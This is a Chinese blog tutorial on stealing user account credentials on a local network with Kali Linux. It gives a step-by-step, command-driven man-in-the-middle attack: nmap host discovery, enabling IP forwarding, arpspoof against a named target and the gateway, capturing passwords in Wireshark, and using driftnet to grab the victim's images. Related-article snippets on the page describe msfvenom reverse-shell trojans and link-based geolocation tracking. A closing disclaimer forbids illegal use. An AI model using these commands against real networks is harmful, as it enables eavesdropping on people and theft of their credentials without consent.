kali linux 获取ip_kali内网渗透之盗取用户账号信息

最新推荐文章于 2024-05-10 09:46:37 发布
最新推荐文章于 2024-05-10 09:46:37 发布
阅读量4k 收藏 32
点赞数 3
文章标签: kali linux 获取ip
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33508272/article/details/112158543
版权

c49b3ed4d79674c14a24e0d79682a7a9.png

kali内网渗透之盗取用户账号信息(使用的是kali-linux-2020-1a)

一、查看一下自己的ip地址以及网卡信息和子网掩码,可以看到本机的ip地址为192.168.1.109,网卡为eth0

sudo ifconfig

21252773b56f5802daf308ad97b5efc8.png

二、利用nmap工具扫描同一局域网内的主机并选择攻击目标,这里我们选择我的另一台电脑 192.168.1.101

nmap -sP 192.168.1.0/24

77c57a12c31eb3edfc50f987241a3d21.png

三、利用ARP欺骗让目标主机的流量经过主机的网卡,再从网关出去,而网关也会把原本流入目标机的流量经过我。

1、在进行arp欺骗之前,我们要先开启本机的IP转发功能,如果不开启的话,我们攻击之后会使目标机断网,而不是欺骗。

echo 1 > /proc/sys/net/ipv4/ip_forward

b82f23a05f5b8e48a469a4d1dccbf699.png

2、对目标主机进行欺骗,如果没有arpspoof可以使用sudo apt-get install dsniff 安装

sudo apt-get install dsniff
arpspoof -i eth0 -t 192.168.1.101 192.168.1.1

68616f8d5025d7a90b2ee73872c639b9.png

四、使用wireshark抓取经过本机eth0网卡的数据包

2af306e4600c7e43a25ff64a5f400b6f.png

fa279a2afc78944a4d67584efca3f5c2.png

五、当被攻击主机访问网站输入用户密码可以在wireshark中找到对应的数据包并取得用户名密码

ac150057bc40c4efb10a6fc30f82702f.png

d26a381ddcff69dae3ff10ad0210a3bf.png

六、另外做了内网欺骗后还可以截取到目标主机上浏览的图片,是不是很赞!

driftnet -i eth0

69ce1abf4f24743415e19980202e1d53.png

最后,此文只是向大家展示一下内网渗透的相关过程,任何人不得用于违法犯罪,否则与本人无关,安全上网,人人有责。

孙叔敖夜
关注
  • 3
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali linux中的信息收集姿势
KHOST的博客
08-18 1087
第一章分类 信息收集是从公开可用资源获取所有相关信息的一种方式,是与目标网络和设备交互过程的一部分,涉及开源情报(Open Sourcew Intelligence,OSINT)。在进行渗透测试时信息收集是整个流程的第一步,在实际测试目标网络前进行的,收集的结果会给出需要额外收集的方向或者直接指出接下来在漏洞利用截断可利用的漏洞。信息收集可以分为两种类型:被动侦察(passive reconnaissance)和主动侦察(reconnaissance)。 被动侦察一般是指分析公开的信息,这些信息..
kali Linux:利用漏洞获取目标主机的IP地址
weixin_58023816的博客
12-10 2687
【代码】kali Linux:利用漏洞获取目标主机的IP地址。
kali渗透内网和外网
最新发布
cc123489ll的博客
05-10 531
第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”lhost:设置kaliIPlport:设置端口(要与下面的setlport保持一致)-f:文件的类型为exe类型-o:生成payload,名为payload.exe,保存在kali的/root目录下第二步:将生成的木马文件发送到对方电脑我们启动kalimsfconsole 进入msfconsole。
kali命令行自动获取ip
星空下de青铜
03-29 7185
简述 我的是最新版kali2020.1a,里面有两块网卡lo(回环)和eth0,但eth0没有开启dhcp,每次切换网络的时候都有点不方便(net的除外) 配置 在这里我们可以看到虚拟机已设置桥接,但物理机与虚拟机网段不一样 进入 /etc/network文件查看并编辑interface文件 原来只有auto lo 和iface lo inet loopback这两行(lo为回环接口) 这里我要...
Kali Linux渗透测试之信息收集
0nc3的博客
06-18 581
0x00 前言 这是一篇信息收集工具使用学习记录,主要参考《Kali Linux渗透测试技术详解》一书。 虽然觉得Metaspoit挺好用的(小声bb),自带的工具也得了解一下 今天也要加油呀~ 0x01 枚举服务 DNS枚举工具 1.1 DNSenum dnsenum --enum baidu.com 1.2 fierce fierce -dns baidu.com SNMP枚举 2.2 ...
kali 的桥接模式下,查询获取IP地址
m0_74634242的博客
11-12 698
手机热点通常用DHCP服务器来为连接到热点的设备分配IP地址,桥接模式下,虚拟机可以通过与无线网络连接的DHCP服务器获取IP地址,然后手机一般不防御和检查,比如mac地址是否一致,因此Kali虚拟机能够成功获取IP地址。不然ifconfig的结果不变,我是用ifconfig eth0(网卡名) down/up来,关闭和重启网卡。使用ifconfig down/up 前需要加sudo,连上手机热点后,手机热点一般不会限制访问。2.阻止kali获取IP地址。
kali linux安全渗透教程_网络攻防_安全测试_KaliLinux安全渗透_
10-02
详细介绍如何使用kali linux进行网络攻防,渗透测试等
Kali Linux高级渗透测试 _2016.05_罗伯特_KaliLinux高级渗透测试_渗透_完整版_
09-29
P226
kali-linux-wireless-pentest_kali_kalilinux_
10-04
Kali Linux 无线渗透测试入门指南
kali-linux-network-scanning-cookbook_kali_kalilinux_
10-02
Kali Linux网络扫描秘籍》是一本专为网络安全专业人士和爱好者编写的指南,它深入浅出地介绍了如何在Kali Linux操作系统中进行网络扫描。Kali Linux,原名BackTrack,是基于Debian的开源渗透测试平台,包含了各种...
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,帮助安全人员更好的完成项目。课程主要内容:学习Kali Linux安全测试使用工具...
请问怎么获取对方IP地址
aibi9196的博客
05-26 427
请问怎么获取对方IP地址? 继续阅读《请问怎么获取对方IP地址》的全文内容... 转载于:https://www.cnblogs.com/delphi2007/archive/2009/05/26/1490271.html
kali linux 渗透技术学习笔记 7.信息收集——其他的信息收集手段(二)
Rorschach的博客
05-26 469
Netdiscover Netdiscover用来主动或被动的继续ARP侦查。次工具在不使用DHCP的无线网络中非常有用。(如果不清楚DHCP的话可以自己查一下,或者可以和我在接下来的博客中学习网络工程相关内容)。 首先我们来看一下它的语法格式: netdiscover: invalid option -- '-' Netdiscover 0.5.1 [Active/passive A...
kali找人
undefine
12-18 2992
下面将在kali演示使用seeker和ngrok配合获取点击链接设备的位置,切勿用于非法用途 工具提供 链接:https://pan.baidu.com/s/1Ltj_FTfznDT1C5irVGyXEg 提取码:jing 需要用到两个工具,一个是用来获取对方位置信息的工具,名为seeker 一个是用来进行反向代理的工具,因为kali在内网所以需要反向代理才能让两个内网的用户链接,名为ngrok 可以去github下载seeker https://github.com/thewhiteh4...
Kali Linux学习笔记---信息收集之被动信息收集
qq_45118881的博客
09-04 283
被动信息收集 nslookup 查询域名IP地址以及子域名 dig 同nslookup但比其功能更强大的是,同域传输,可以查询dns服务器的bind版本(一般不会有)作为入侵点 DNS爆破命令: 1.fierce -dnssersver 8.8.8.8 -dns yzu.edu.cn -wordlist /user/share/fierce/hosts.txt 2.dnsdict6 -d4 -t 16 -u xxx.edu.cn dpkg -L 查找 whois 58.192.131.
Kali-linux其他信息收集手段
2301_77162959的博客
05-14 1197
上面介绍了使用不同的工具以操作步骤的形式进行了信息收集。在Kali中还可以使用一些常规的或非常规方法来收集信息,如使用Recon-NG框架、Netdiscover工具和Shodan工具等。本节将介绍使用这些方法,实现信息收集。
kali下使用seek追踪定位IP地址(渗透笔记)
weixin_43899811的博客
11-27 1776
在整个实验中,最头疼最无语的还是一开始kali版本选择上的问题,一定要选择kali2023,并且在清华大学镜像源中下载镜像。作为攻击者,我认为这种攻击方式还需要再进一步完善社工方面的问题,例如如何实现手机不提示开启位置功能,如何实现苹果端显示位置,如何不提示该网址是伪装网址等等,值得我们考虑和深思。作为被攻击者,我们一定在日常使用互联网中,不要随意打开陌生链接!那么最后,着重强调:此篇文章仅供技术交流和探讨,严禁利用该手段进行违法行为,出现一切问题后果自负!不足之处敬请批评指正!
Kali虚拟机采用桥接模式;物理机连接WiFi,Kali中查看网络配置,获取IP地址
cherry70的博客
11-17 3318
防火墙通过控制和检测网络之中的信息交换和访问行为来实现对网络安全的有效管理,在网络间建立一个安全网关,对网络数据进行过滤(允许/拒绝,控制数据包的出,封堵某些禁止行为,提供网络使用状况(网络数据的实时/事后分析及处理,网络数据流动情况的监控分析,通过日志分析,获取时间、地址、协议和流量,网络是否受到监视和攻击),对网络攻击行为进行检测和告警等等,最大限度地防止恶意或非法访问存取,有效的阻止破坏者对计算机系统的破坏,可以最大限度地保证校园网应用服务系统的安全工作。执行该命令后,该网卡将不再使用。
kali linux 获取ip_Kali Linux常用服务配置教程获取IP地址
weixin_34254848的博客
12-28 1154
Kali Linux常用服务配置教程获取IP地址下面以Kali Linux为例,演示获取IP地址的方法(1)设置网络接口为自动获取IP地址。在Kali Linux的收藏夹中单击图标,将显示所有的程序,如图1.8所示。 (2)单击“设置”图标,将打开“设置”窗口,如图1.9所示。 (3)选择“网络”选项,单击有线连接中的齿轮按钮,将显示“有线”对话框,如图1.10所示。 (4)勾选“自动连接”复选...
kali Linux渗透基础知识.pdf
01-25
kali Linux渗透基础知识

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值